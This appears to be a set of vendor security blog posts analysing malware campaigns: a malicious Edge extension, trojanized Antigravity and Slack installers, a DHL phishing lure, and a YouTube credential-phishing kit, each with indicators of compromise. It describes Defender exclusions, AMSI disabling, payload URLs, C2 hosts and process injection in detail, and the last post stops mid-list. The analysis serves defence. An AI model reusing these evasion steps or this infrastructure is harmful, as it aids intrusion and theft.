The fake malicious extension on Edge Browser

What the malicious extensions can do

The extension gives attackers near full control over the browser, with capabilities that go far beyond typical malware.

It can:

  • Connect to a remote server using a built-in API key and regularly check in for instructions. It can also switch to backup domains if the main server goes offline.
  • Generate a unique ID to track the infected user over time.
  • Collect full browsing history and send it to a remote server (/upload).
  • Monitor what you’re doing in real time, including which sites you visit, and apply attacker-controlled redirect rules. This allows it to silently send you to different websites or alter what you see on a page, including injecting or hiding content.
  • Intercept downloads, cancel legitimate files, and replace them with malicious ones from attacker-controlled servers.
  • Inject scripts directly into web pages, enabling further data theft or manipulation.
  • Display fake browser notifications with attacker-controlled text and images.

How it communicates with attackers

The stealer and its extension communicate with command-and-control (C2) servers using several API endpoints. These are essentially different “channels” used for specific tasks:

  • /backup-domains/active—retrieves backup servers to stay connected if the main one is blocked
  • /upload—sends stolen data back to the attackers
  • /extension—receives instructions for redirects, downloads, and notifications
  • /scripts—downloads malicious code to inject into web pages

How to stay safe

Scammers are increasingly using AI-themed tools to make fake websites look legitimate. In this case, a supposed “AI trading assistant” was used to trick people into installing malware.

To reduce your risk:

  • Download software only from official websites. If a tool claims to work with a well-known platform, check the platform’s official site to confirm it’s real.
  • Check who created the file before running it. Look at the publisher name and avoid anything that looks unfamiliar or inconsistent.
  • Review your browser extensions regularly. Remove anything you don’t recognize, especially extensions you didn’t knowingly install.

What to do if you think you’ve been affected

If you think you may have downloaded this infostealer:

  • Check EDR and firewall logs for communications with the C2s listed in the IOCs part.
  • From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Change all passwords and enable 2FA for accounts you have accessed from this machine.
  • Check the folder %LOCALAPPDATA%\Packages\Extensions and suspicious browser extensions.
  • If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.
  • Run a full scan with Malwarebytes.

Indicators of Compromise (IOCs)

HASH

95dcac62fc15e99d112d812f7687292e34de0e8e0a39e4f12082f726fa1b50ed

0d10a6472facabf7d7a8cfd2492fc990b890754c3d90888ef9fe5b2d2cca41c0

Domains

Tradingclaw[.]pro: fake website

Chrocustumapp[.]com: related to malicious extension

Chrocustomreversal[.]com: related to malicious extension

google-services[.]cc: related to malicious extension

Coretest[.]digital: C2 panel

Reisen[.]work: C2 panel

IPs

178[.]16[.]55[.]234: C2 panel

185[.]11[.]61[.]149: C2 panel

37[.]221[.]66[.]27: C2 panel

2[.]56[.]179[.]16: C2 panel

178[.]16[.]54[.]109: C2 panel

37[.]221[.]66[.]27: C2 panel

209[.]17[.]118[.]17: C2 panel

162[.]216[.]5[.]130: C2 panel


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Fake Google Antigravity downloads are stealing accounts in minutes

21 April 2026 at 16:04

Somebody went looking for Google’s new Antigravity coding tool this week, clicked download, ran the installer, and got exactly what they thought they were getting. Antigravity installed cleanly. A shortcut appeared on the desktop. The application opened and worked. Nothing looked or felt wrong.

But behind the scenes, that installer can give your accounts, your data, and even your machine to an attacker, without breaking anything the user can see.

In this article, we’ll break down the technical details of the campaign, how it works under the hood, and what to do if you think you’ve installed it.

The download that actually gave you what you wanted

Google Antigravity launched in November 2025 and has been one of the most searched-for developer tools on the web ever since. The real product lives at antigravity.google. Hardly anyone new to the product has the real URL memorized, so when a user reached a hyphenated lookalike (what we call a typosquat domain) at google-antigravity[.]com it was convincing enough at a glance.

Homepage of the fake Google Antigravity for Windows site

So they went on to download the file, called Antigravity_v1.22.2.0.exe.

The installer isn’t simply named to look like the real one from Google. It’s 138 MB: large enough to carry the entire Antigravity application, its Electron runtime, its Vulkan graphics libraries, its updater, all of it. Because that is what is actually inside.

The attacker didn’t build a convincing fake; they took the genuine Antigravity installer, added one additional step to run their PowerShell script during setup, and repackaged the result. The malicious step is one extra line in a sequence that runs dozens of legitimate ones. Here’s what the Setup looked like:

The trojanized Antigravity installer Setup Wizard (1)
The trojanized Antigravity installer Setup Wizard (2)

How do we know it’s one line? Because you can see it.

The MSI’s custom-action table (the list of every step the installer takes during install) contains 11 rows that are standard, boilerplate entries the installer tool generates automatically: extract files, check the Windows version, elevate to admin, write a log, clean up afterwards. Each of those has a name that starts with AI_ followed by a description of what it does. And then, sitting at the bottom of the same list, there is one more row, named wefasgsdfg — a keyboard mash the attacker typed in when the installer tool prompted them for a name, and the one that runs their PowerShell script.

The trojanized Antigravity installer Setup Wizard (3)

Antigravity installs properly into C:\Program Files (x86)\Google LLC\Antigravity\. A Start Menu entry appears, a desktop shortcut is placed, and everything works. The user opens the app, tries it, closes it, and goes on with their day. It all seems fine, because they actually installed the thing they wanted to install. The malicious part is happening quietly, in a folder they’ll never open.

Two small scripts, and a phone call

Somewhere in the middle of the install, the MSI runs a small helper script that drops two PowerShell files into the user’s temporary folder: scr5020.ps1 and pss5032.ps1. The filenames look like specifics but aren’t: the four characters after each prefix are generated fresh every time the installer runs.

What stays constant is the prefix: scr for the user script, pss for the PowerShell wrapper, because those come from the installer tool’s standard naming pattern for custom-action scripts.

Of the two files, the second is an unaltered Advanced Installer utility. It’s genuinely innocent and present in many real products. The first was added by the attacker, and it has one job: open an HTTPS connection to https://opus-dsn[.]com/login/, download whatever code the server sends back, and run it. To blend in, it spoofs a Microsoft referrer header and routes through the system’s default web proxy, so it inherits whatever corporate proxy configuration and authentication IT has set up, without the user noticing. It also saves and restores the parent PowerShell’s TLS setting, leaving that one global unchanged after it exits. That’s the entire script.

Researchers call this pattern a downloader cradle, and its advantage to the attacker is flexibility. The real payload lives on their server, not inside the installer out in the wild, so they can swap it out, change targeting, or turn the operation off without touching the file users are downloading.

The trojanized Antigravity installer phone call

In this case, the cradle did exactly what it was built to do and no more: a DNS query for opus-dsn[.]com, a single TCP connection on port 443 to 89[.]124[.]96[.]27 with a quiet HTTPS GET to /login/, and then the PowerShell process exited.

Nothing else happened. No second-stage script was fetched. No file was dropped. No scheduled task was created. No changes were made to Windows Defender. Most automated security tools would shrug and move on.

But the malware hadn’t failed. It had introduced itself to the attacker’s server and asked for code to run next—and whether the answer comes back is a decision the operator gets to make later, on their own time, one victim at a time. You cannot tell, from the victim’s side, what was returned. For analysis, we retrieved what the server sends when the answer is yes.

What arrives when the answer is yes

When the server decides a target is worth attacking, the follow-on script does its work in three movements.

First, it makes Defender look the other way. It calls Add-MpPreference (with the cmdlet name split by a backtick, a small obfuscation to dodge naïve string-matching detections) to exclude %ProgramData% and %APPDATA% from scanning, exclude .exe, .msi, and .dll files from scanning, and exclude PowerShell, regasm.exe, rundll32.exe, msedge.exe, and chrome.exe from scanning. Only after that does it phone home—collecting a profile of the machine (Windows version, Active Directory domain, installed antivirus product), RSA-encrypting it with a public key embedded in the script, and sending it to opus-dsn[.]com inside a utm_content query parameter that looks, in any access log, like ordinary marketing tracking. This is the profile the operator uses to decide whether this particular machine is worth the next stage.

Second, it widens the gap. A second Add-MpPreference block extends the exclusion list to include the .png file extension and the conhost.exe process—the exact two additions the next stage will need. It then writes AmsiEnable=0 into HKLM\Software\Policies\Microsoft\Windows Script\Settings, disabling Windows’ Antimalware Scan Interface—the layer that normally lets Defender read scripts before they execute. After this point, the malicious activity is being conducted in folders, with file types, and through processes that Defender has been instructed to ignore.

Third, it stages persistence. It downloads a file called secret.png from https://captr.b-cdn[.]net/secret.png (a BunnyCDN URL that looks at a glance like any other content-delivery link) and saves it to C:\ProgramData\MicrosoftEdgeUpdate.png, a path chosen to sit beside Microsoft’s real browser-update folders. The file is not an image. It is an AES-256-CBC ciphertext (key and IV both derived via PBKDF2 with 10,000 iterations from a hardcoded passphrase) wrapping a .NET assembly. A scheduled task is then registered with the name MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}, which is all but indistinguishable at a glance from the real Microsoft Edge update task and set to fire at every logon, running unprivileged so it never produces a UAC prompt. The action it executes is conhost.exe --headless launching a hidden PowerShell, which decrypts the fake PNG in memory and reflectively loads the resulting .NET assembly into its own address space. Nothing lands on disk as an ordinary executable. All that persists is the encrypted image, in a folder Defender has been asked to ignore.

And then a second payload, that doesn’t persist at all. The script doesn’t stop there. After registering and starting the scheduled task, it sends a second beacon to confirm install, then runs an entirely separate block that downloads a second encrypted file (GGn.xml) from the same BunnyCDN host, decrypts it with a different, hardcoded AES key, and reflectively loads that assembly into the running PowerShell process too. The first payload survives reboots; this one runs once, in memory, and is gone. Two .NET assemblies, one campaign, on the victim.

What the payload is built to do

The decrypted assembly is a .NET stealer. We can characterize it from its own class and method names, which describe its job in plain English: it scans browsers, messaging apps, gaming platforms, FTP clients, and crypto wallets, collecting data labeled Logins, Cookies, Autofills, and FtpConnections.

In practice, that means every Chromium- and Firefox-based browser on the machine (Chrome, Edge, Brave, and others) gets stripped of saved passwords, autofill data (including saved credit cards), and the cookies that keep users signed in. Discord tokens, Telegram sessions, Steam logins, FTP credentials, and cryptocurrency wallet files are taken as well.

(Most of the exact target paths are obfuscated and only decrypted at runtime, so the specific apps aren’t all visible from a static analysis, but the categories of theft are clear from the class names.)

The trojanized Antigravity installer functions

Session cookies are the part that should alarm most people, because they work faster than anything else. A stolen login cookie lets an attacker walk straight into a Gmail inbox or banking portal without needing a password or triggering two-factor authentication. As far as the website is concerned, the user is already signed in. The gap between infection and account takeover can be minutes.

Beyond data theft, the malware also imports Windows APIs used for clipboard hijacking and keystroke logging, tools that can capture what you type or swap a cryptocurrency wallet address at the exact moment you send funds.

It also includes the building blocks for “hidden desktop” tradecraft: creating a second, invisible Windows desktop that the attacker can capture and potentially control. In its most advanced form, this lets an attacker operate inside that hidden environment—logging in to accounts, approving transactions, or sending messages—while the victim’s real screen shows nothing unusual. For the duration of the infection, the attacker is, effectively, a second presence on the computer.

A new tool, a new lookalike, the same trap

The reason this campaign matters beyond the single installer is that its shape isn’t new. It’s a refined version of a pattern we’ve been watching for months: new AI products launch with huge attention, and within weeks, lookalike domains and trojanized installers appear alongside them. Antigravity is the latest example, but it won’t be the last.

The incentive for attackers is obvious. Every high-profile AI launch creates a surge of users who want to try it immediately, before they’ve had time to memorize the real URL, or might fail to double-check it against trusted sources.


Picked up something you shouldn’t have?


What makes this style of campaign hard to spot is that most victims never know they were targeted. Those who escaped, because the operator chose not to escalate on their machine, have no reason to think anything happened.

The ones who didn’t escape usually find out later: a password reset they didn’t request, a friend asking about a strange message, or a bank balance that suddenly looks wrong. By then, the decision to target them was made days earlier.

What to do if you may have been affected

If you or anyone who shares your computer recently installed something calling itself Google Antigravity from anywhere other than antigravity.google, start by checking the network indicators. Look in firewall logs, EDR alerts, or your router logs for connections to opus-dsn[.]com, captr.b-cdn[.]net, or 89[.]124[.]96[.]27. A single connection from a PowerShell process is enough to confirm the check-in happened.

  • From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Most services have a “sign out everywhere” option under security settings.
  • Change passwords on those accounts, starting with your email. If your email is compromised, an attacker can reset almost anything else.
  • Rotate any API keys, SSH keys, or cloud credentials that were on the affected computer, not just the passwords attached to them.
  • If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.
  • Watch your bank and credit card statements for unfamiliar charges, and consider placing a fraud alert with your bank.
  • Wipe and reinstall Windows. A machine that has run this class of malware should not be trusted.
  • If the machine is a work laptop, tell your IT or security team today. The beacon collects the machine’s Active Directory domain, so on a domain-joined corporate laptop, the attacker now knows which company’s network this victim belongs to, which means this isn’t just a personal problem.

Indicators of Compromise (IOCs)

File hashes (SHA-256)

61aca585687ec21a182342a40de3eaa12d3fc0d92577456cae0df37c3ed28e99 (Antigravity_v1.22.2.0.exe)

Network indicators

captr.b-cdn[.]net

google-antigravity[.]com 

opus-dsn[.]com

89[.]124[.]96[.]27


CNET Editors' Choice Award 2026

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review


“Your shipment has arrived” email hides remote access software

17 April 2026 at 09:40

An attachment in an email impersonating DHL about a shipment contains a link to a preconfigured SimpleHelp remote access tool—an ideal starting point for attackers to explore a network, steal data, and drop additional malware.

A German industrial spare parts and equipment supplier received an email pretending to be from DHL, claiming a shipment had arrived.

Screenshot of email pretending to be from DHL

Given their line of business, I imagine they get this type of email all the time. But a few details stood out:

  • The sender’s email address did not belong to DHL,
  • the receiver address was the general info@ for the company,
  • the images in the email were hosted on ecp.yusercontent.com,  
  • and, most importantly, there was attachment.

While the remote content is hosted on a legitimate Yahoo webpage commonly used to serve images and other content in Yahoo Mail, this is not something DHL typically uses.

The attachment, a PDF file called AWB-Doc0921.pdf is just a blurred image with a Microsoft-branded button that prompts the victim to “Continue” to access a secure file.

blurred content with a Continue button

In reality, clicking the button downloads a file called AWB-Doc0921.scr from the domain longhungphatlogistics[.]vn, a domain belonging to a Vietnamese logistics company that was likely compromised to host malware.

Malwarebytes blocks longhungphatlogistics[.]vn
Malwarebytes blocks longhungphatlogistics[.]vn

A .scr file is a Windows file, which is an executable (.exe) file used to launch screensavers. They are often used to hide malicious code because Windows trusts them, allowing them to bypass some security layers. 

In this case, the file is a modified installer of a remote access tool signed by SimpleHelp.

UAC prompt for the signed installer
UAC prompt for the signed installer

SimpleHelp is a remote support and remote monitoring and management (RMM) platform. It allows remote desktop control, file transfer, diagnostics, and unattended access. In the wrong hands, that’s effectively a support-style backdoor. Attackers can use it for reconnaissance, credential theft, lateral movement, defense evasion, and staging further malware, including ransomware. We’ve seen SimpleHelp abused in this way before.

This is basically a beaconing model. Once installed, the system connects out to the attacker’s server, which is more likely to be allowed through NAT and firewalls than inbound connections. Because the user initiated the install, the attacker gets immediate visibility of the system and can reconnect later whenever the service is running. In the case of a phish, that means the lure only has to get the victim to execute the file once. After that, the attacker’s console can show the new machine as a manageable asset.

For what seems to be a non-targeted attack, the campaign shows a decent level of sophistication by using legitimate components to trick targets into running the remote access tool.

How to stay safe

The good news: once you know what to look for, these attacks are much easier to spot and block. The bad news: they’re cheap, scalable, and will continue to circulate.

So, the next time a “PDF” prompts you to download a file, pause to think about what might be hiding under the hood.

Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

  • Only access your accounts through official apps or by typing the official website directly into your browser.
  • Check file extensions carefully. Even if a file installs a legitimate tool, it may not be safe to run it.
  • Enable multi-factor authentication for your critical accounts.
  • Use an up-to-date, real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this email as a scam.


Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

A fake Slack download is giving attackers a hidden desktop on your machine

16 April 2026 at 11:26

A trojanized Slack download from a typosquatting website is giving attackers something most users wouldn’t even know to look for: a hidden desktop running on their machine.

The installer looks legitimate and even launches a working copy of Slack. But in the background, it can create an invisible session where attackers can browse, access accounts, and interact with your system without anything appearing on your screen. To be clear, this campaign has nothing to do with Slack, the company, and we’ve let them know what we found.

Slack has tens of millions of daily active users across more than 200,000 paying organisations in over 150 countries, including 77 of the Fortune 100. So a trojanized installer is not just a threat to the individual who runs it, but also to corporate networks, SSO-linked accounts, and internal communications.

Everyone trusts the logo

Website impersonating Slack
Fake Slack website

Slack is one of those apps that people install without a second thought. It sits alongside Chrome and Zoom in the pantheon of software that workers download on day one of a new job, often from a quick Google search rather than a bookmarked link. That’s what makes it such a compelling lure. The brand is instantly recognisable, the installer is something millions of people have run before, and the whole experience of watching it set up feels completely ordinary.

The attackers behind this campaign registered the domain slacks[.]pro (note the extra “s” and the .pro top-level domain instead of .com). The site’s source code includes a JavaScript click handler that intercepts every click on the page and redirects the browser to a download hosted on a separate domain, debtclean-ua[.]sbs. The only clicks excluded are the cookie consent buttons; everything else triggers the download. This is not a true drive-by that exploits the browser silently, but it’s close enough: it requires just one click from a distracted user.

What arrives on the victim’s desktop is a file named slack-4-49-81.exe, a name that mirrors Slack’s real version numbering closely enough that most people wouldn’t hesitate.

JavaScript click handler
JavaScript click handler

This isn’t an obscure tactic. In August 2024, we documented a near-identical campaign using fraudulent Google Ads to redirect Slack searches to a malicious download page. Those attacks delivered SecTopRAT, a remote access Trojan with stealer capabilities.

These campaigns keep coming back because the formula works: attackers take a trusted brand, register a convincing domain, and count on the fact that most people do not scrutinise a URL when they’re just trying to get set up for work.

A real install and a hidden loader, running side by side

Here’s what makes this particular sample clever: it doesn’t just pretend to install Slack. It actually installs a working copy of the application while simultaneously running a malware loader in the background. The victim sees a legitimate splash screen, watches Slack appear in their taskbar, and has no reason to suspect anything went wrong.


Picked up something you shouldn’t have?


Within seconds of being launched, slack-4-49-81.exe writes two temporary files to the user’s %TEMP% folder. The first, slack.tmp, is the decoy: a self-extracting Squirrel installer package. Squirrel is a legitimate, open-source update framework built into dozens of Electron apps including the real Slack, Discord, and Microsoft Teams. The dropper bundles a genuine copy of Squirrel’s Update.exe alongside a NuGet package called slack-4.49.81-full.nupkg, a branded splash image (background.gif), and a release manifest. When slack.tmp runs, it unpacks all of this into %LOCALAPPDATA%\SquirrelTemp, launches Update.exe with a standard --install flag, and from that point on, the Slack installation proceeds exactly as it would if the user had downloaded the app from slack.com. Slack opens, looks right, and works.

The second file, svc.tmp, arrives seconds later. This is the loader: a separate ~519KB executable embedded inside the 150MB installer and extracted into %TEMP% alongside the decoy. It is unsigned, identifies itself in its portable executable (PE) metadata as Windows Component Update Service by Microsoft Corporation, and has no relationship to the Squirrel framework or the Slack application being installed next to it. Almost immediately it creates a small file called loader_log.txt in the temp folder, confirming the loader stage has started, and attempts to contact a command-and-control (C2) server at 94.232.46.16 on TCP port 8081.

Meanwhile, the Squirrel installation completes and writes a registry Run key to survive reboots: value name com.squirrel.slack.slack under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. This is the exact key name and path that a legitimate Slack installation creates. An IT admin scrolling through autostart entries would see what looks like a normal Slack install and keep moving.

Inside the loader: what static analysis reveals

To understand what the loader is engineered to do once it has a C2 channel, we examined the binary directly. Its PE version information claims to be a Windows Component Update Service (internal name WinSvcUpd.exe), published by Microsoft Corporation, version 1.4.2.0. None of this is true. It’s a false flag designed to survive a glance in a process list or task manager.

The binary is a 64-bit Windows executable compiled with MSVC. Its seven PE sections carry randomised names, like .7ssik, .d1npl, .m6zef, rather than the standard .text and .rdata produced by normal compilers, consistent with the use of a custom builder or crypter tool. Its import table is deliberately minimal: 90 functions from KERNEL32.dll and nothing else. There are no static imports for networking, registry access, or process manipulation. Instead, it resolves those APIs at runtime using GetProcAddress and LoadLibraryExW, a standard technique that hides the binary’s real capabilities from import-table analysis.

PE sections
PE sections

What makes this sample unusual for a loader is how talkative it is internally. The binary is laced with debug strings that lay out its entire architecture, organised into labelled subsystems. These strings were never meant for the victim to see. They are developer diagnostics left in the build, and they tell us exactly what this tool was designed to do.

Strings prefixed [P1] describe the first phase: the loader downloads a payload from its C2 ([P1] Downloading payload...). The download itself uses WinHTTP, resolved at runtime. The debug strings [HTTP] Connect, [HTTP] Send, and [HTTP] Recv trace the full request cycle, while [HTTP] winhttp unavailable reveals the fallback path if the library cannot be loaded. It stores the payload in shared memory via Windows file-mapping APIs ([P1] Payload in shared memory), and launches a second copy of itself as Phase 2 ([P1] Phase-2 launched). Phase 2 reads the payload from shared memory ([P2] Payload copied from shared memory) and decrypts it. The strings [CRYPT] Decrypting... and [CRYPT] MZ OK confirm the payload arrives encrypted and is validated as a Windows executable after decryption. The decrypted DLL is written to disk under a filename matching the pattern wmiprvse_*.tmp, designed to blend in with temporary files created by the legitimate Windows WMI Provider Host.

The loader is then designed to call a specific exported function from the decrypted DLL: HvncRun. The strings [LOAD] Calling HvncRun... and --- HvncClient log --- identify the payload as an HVNC client, a Hidden Virtual Network Computing tool. HVNC differs from a conventional remote access Trojan in a critical way: it creates a completely separate, invisible desktop session on the victim’s machine. The attacker can open browsers, access banking portals, and interact with authenticated sessions without anything appearing on the user’s visible screen. It’s a tool primarily associated with financial fraud operations.

To run the HVNC payload covertly, the loader is equipped to inject the DLL into explorer.exe using a technique known as section-based injection. The strings [INJ] === Section-based injection into explorer.exe === and [INJ] Remote thread created in explorer.exe! describe a sequence in which the loader creates a shared memory section via NtCreateSection, maps it into both its own process and the Windows shell, writes shellcode and the DLL path into the shared region, and starts a remote thread via NtCreateThreadEx. This is a harder-to-detect variant of process injection than the classic WriteProcessMemory approach, because it avoids writing directly into the target’s memory space. If the NT APIs are unavailable, the loader falls back to writing the DLL to disk and loading it directly ([INJ] Required NT APIs not available, falling back to DropAndLoad).

Strings

The binary includes active anti-analysis defences. The string [AA] Debugger/sandbox detected indicates it checks for observation and alters its behaviour accordingly. It has the tools to do so: IsDebuggerPresent and GetTickCount appear in the import table, commonly used for debugger detection and timing-based sandbox evasion, though both are also standard CRT imports in any MSVC-compiled binary. The debug string is the stronger signal that these APIs are used intentionally.

What this means for someone who ran it

If you downloaded Slack from anywhere other than slack.com recently, particularly from a domain ending in .pro, or one that auto-downloaded a file when you clicked anywhere on the page, take it seriously.

The loader attempts to reach its C2 server before the Slack window finishes loading. It is engineered to use that connection (if established) to download and decrypt an HVNC payload and inject it into explorer.exe to operate from within the Windows shell itself. The Squirrel installation writes the same Run key that a legitimate Slack install would, so the autostart entry is indistinguishable from a clean machine. Meanwhile, the loader only needs to succeed once: if it downloads the HVNC payload and injects it into explorer.exe during the initial execution, the attacker has a foothold that lasts until the next reboot. Whether additional persistence for the payload exists depends on the C2 operator’s next moves.

How to stay safe

This campaign is a case study in how much engineering effort goes into looking ordinary. One code path installs real software through a legitimate framework. The other runs a multi-phase loader with dynamic API resolution, encrypted payload delivery, process injection into the Windows shell, and anti-analysis defences, all packed into a binary that identifies itself as a Microsoft service. The decoy hides what’s going on, while the loader gives the attacker a foothold.

Bookmark the real download pages for the software you use. If you find yourself Googling “Slack download” and clicking the first result that looks right, you’re exactly the person this campaign was built to catch.

  • Only download Slack from the official site. Go directly to slack.com or use a trusted bookmark. Avoid clicking ads or unfamiliar links.
  • Check the URL carefully. Look for subtle changes like extra letters or unusual domains (for example, “.pro” instead of “.com”).
  • Be wary of sites that trigger downloads on click. If a page starts downloading a file when you click anywhere, close it.
  • Verify the installer before running it. Right-click the file, check its properties, and look for a valid digital signature.
  • Use real-time security protection. A security tool can block known malicious domains and catch suspicious behavior during installation.
  • Watch for unusual behavior after installing software. Unexpected network activity, slowdowns, or unknown processes are worth investigating.
  • If something feels off, act quickly. Disconnect from the internet, run a full scan, and change your passwords from a clean device, especially for email, banking, and work accounts.

What to do if you may have been affected

  • Disconnect from the network immediately to sever any active C2 session.
  • Run a full scan with Malwarebytes.
  • Change all passwords for accounts you have accessed from this machine. Do this from a different, clean device. Prioritise email, banking, and SSO accounts.
  • If this was a work machine, notify your IT or security team immediately.

Indicators of Compromise (IOCs)

File hashes (SHA-256)

cfd2e466ea5ac50f9d9267f3535a68a23e4ff62e3fe3e20a30ec52024553c564 (slack-4-49-81.exe)

08fd0a82cdeb0a963b7416cf57446564dfed5de5c6f66dee94b36d28bfefec9d (svc.tmp)

Distribution

slacks[.]pro

debtclean-ua[.]sbs

Network indicators

94.232.46.16:8081


CNET Editors' Choice Award 2026

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review


Fake YouTube copyright notices can steal your Google login

15 April 2026 at 15:21

A convincing phishing campaign is going after YouTube creators, and if it works, attackers don’t just steal your Google login. They can take over your entire Google account, including Gmail, your files, and payments, then hijack your YouTube channel and use your audience to run scams.

The lure is a fake copyright strike notification that’s so convincing even security-aware users could fall for it. The attack site pulls in your real channel data, such as your profile picture, subscriber count, and latest video, to build a personalized scare page. It funnels you toward a sign-in page designed to steal your Google account.

The operation runs like a franchise: multiple attackers share the same platform, each running their own campaigns against different creators.

Why your YouTube channel is worth more than you think

For full-time creators, a YouTube channel isn’t just a hobby, it’s a business. It generates revenue through ads, sponsorships, and merchandise. And it all sits behind a single Google login that also controls your Gmail, Google Drive, and payment details.

That’s what makes creators such attractive targets. Attackers who hijack a channel often rebrand it within minutes, typically to impersonate a cryptocurrency company, and use the existing audience to livestream scams. The original creator gets locked out and watches their years of work being used to defraud their own subscribers.

A copyright strike is the perfect bait because it exploits the one thing creators fear most: losing their channel overnight.

“Check your Youtube copyright status instantly”

The campaign runs from a site called dmca-notification[.]info. The browser tab reads “Youtube | Copyright strikes,” and the page itself looks clean and professional, complete with YouTube logo, search bar, and helpful instructions.

"Check Your Youtube Copyright Status Instantly"

It invites you to enter your channel name, @handle, or video link to check your copyright status. Nothing about it stands out as immediately suspicious.

Each phishing link includes the target’s channel handle directly in the URL, so the page already knows who you are before you type anything.

The source code contains a tracking flag called suppressTelegramVisit, which changes how visits are logged depending on whether an affiliate parameter is present. This suggests the operators may be coordinating traffic through Telegram, although the kit could be distributed through any platform.

Your own videos, used against you

"Loading information to channel"

Once the page has your channel name, it fetches real data from YouTube: your avatar, subscriber count, video count, and your most recent upload (including its title, thumbnail, and view count). That information is then used to build a fake copyright complaint.

You see your own branding alongside a claim that a specific segment of your latest video has been flagged for copyright infringement. The timestamps are dynamically generated for each victim based on the video’s length, making each notice look unique and legitimate. It’s similar to receiving a fake legal notice that includes your real home address. The personal details make it harder to dismiss as spam.

“Respond within three days or face enforcement actions”

"Deleting the video will not remove the strike"

The page piles on the pressure. A warning tells you that deleting the video won’t remove the strike. A red notice threatens that if you don’t respond within three days, your channel will face enforcement actions. The proposed fix is simple: sign in with Google to verify you’re the channel owner, and the claim will be resolved within 24 hours.

Every element on the page is designed to push you toward the “Login via Google” button before you stop to think.

The sign-in page that steals your account

When you click that button, the site contacts its own backend server to fetch the address of an external phishing page, one that the attacker can swap out to a new domain at any time.

In observed traffic, the request to /api/get-active-domain returned the domain blacklivesmattergood4[.]com, which was then loaded inside a full-screen overlay on top of the copyright notice page.

What appears next is a classic Browser-in-the-Browser attack: a fake Chrome pop-up rendered entirely in HTML and CSS. It includes a title bar reading “Sign in – Google Accounts – Google Chrome,” a padlock icon, and a URL that looks like accounts.google.com. None of it is real. They’re all just graphics. The only real address bar is the one at the top of your actual browser, which still shows dmca-notification[.]info.

Inside the fake window sits a convincing replica of Google’s sign-in page. It looks exactly like the real thing, but every keystroke goes to the attacker.

Fake Google sign-in

Traffic capture also showed attempts to contact additional domains—dopozj[.]net, ec40pr[.]net, and xddlov[.]net—which returned 502 errors at the time of capture. These may be backup infrastructure or credential relay servers that were offline.

The rotating-domain approach is what makes this campaign resilient. The phishing domain is fetched in real time with no caching, allowing attackers to rotate infrastructure quickly. If one domain is taken down, the next victim is sent to a new one.

Once credentials are entered, the overlay closes and the victim is returned to the copyright notice page with no confirmation or error . It gives the attacker time to use the stolen credentials before the victim realizes anything happened.

Big channels get a free pass (on purpose)

One interesting detail: the kit checks whether the target channel has more than three million subscribers. If it does, the entire phishing flow is skipped. Instead of the copyright strike warning and login button, the page shows a benign message: “Your channel is in good standing. No further action is needed.”

This is almost certainly an evasion tactic. Very large channels are more likely to have dedicated security teams, relationships with YouTube’s trust and safety staff, or the visibility to trigger a rapid takedown if they publicly report the scam. By automatically exempting them, the kit reduces the risk of drawing attention from exactly the people most capable of getting the operation shut down.

Not just one scammer

The source code reveals that this isn’t a single phishing page run by one person. The kit includes an affiliate tracking system where each attacker gets their own ID embedded in the phishing links they send out. A central backend tracks which operator delivered which victim and how far each target got through the funnel. Our traffic capture confirms this: the phishing link included a referral ID (ref=huyznaetdmca), the default affiliate tag, which appears to be a transliteration of a Russian phrase. Brand names like Google and YouTube are also written with lookalike Cyrillic characters in the source code to evade automated security scanners.

In short, this is phishing-as-a-service: a shared platform that multiple attackers can use to run campaigns against YouTube creators at scale.

How to protect yourself

This campaign is a reminder that phishing has moved far beyond badly spelled emails from a Nigerian prince. Today’s phishing kits are professionally engineered platforms with rotating infrastructure, real-time personalization, and franchise-style distribution.

For YouTube creators, the key rule is simple: copyright strikes only appear in YouTube Studio.

If you get a warning anywhere else, treat it as suspicious.

  • Be wary of urgency. Real copyright processes don’t rush you into action
  • Go directly to studio.youtube.com or through trusted channels to check your status
  • Never sign in through a link in an email or message

Spot a fake browser window

  • Try dragging it: A real window moves freely. A fake one is stuck inside the page
  • Minimize your browser: A real pop-up stays open. A fake one disappears
  • Check the URL: If you can’t interact with it, it’s just an image

Even if everything looks right, always check the actual address bar before entering your username and password.

If you’ve already entered your details, act quickly:

  • Change your Google password immediately
  • Revoke active sessions in your account security settings
  • Check your YouTube channel for unauthorized changes

Indicators of Compromise (IOCs)

Domain

  • dmca-notification[.]info (primary phishing site)
  • blacklivesmattergood4[.]com (credential harvesting domain — active at time of capture)
  • dopozj[.]net (associated infrastructure — 502 at time of capture)
  • ec40pr[.]net (associated infrastructure — 502 at time of capture)
  • xddlov[.]net (associated infrastructure — 502 at time of capture)

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere

15 April 2026 at 12:37

We’ve uncovered multiple campaigns distributing an infostealer we track as NWHStealer, using everything from fake VPN downloads to hardware utilities and gaming mods. What makes this campaign stand out isn’t just the malware, but how widely and convincingly it’s being spread.

Once installed, it can collect browser data, saved passwords, and cryptocurrency wallet information, which attackers may use to access accounts, steal funds, or carry out further attacks.

We detected multiple campaigns using different platforms and lures to distribute NWHStealer. The stealer is loaded and executed in several ways, such as self-injection or injection into other processes like RegAsm (Microsoft’s Assembly Registration Tool). Often, additional wrappers such as MSI or Node.js are used as the initial loader.

The stealer is distributed using lures (what the file claims to be) such as:

  • VPN installers
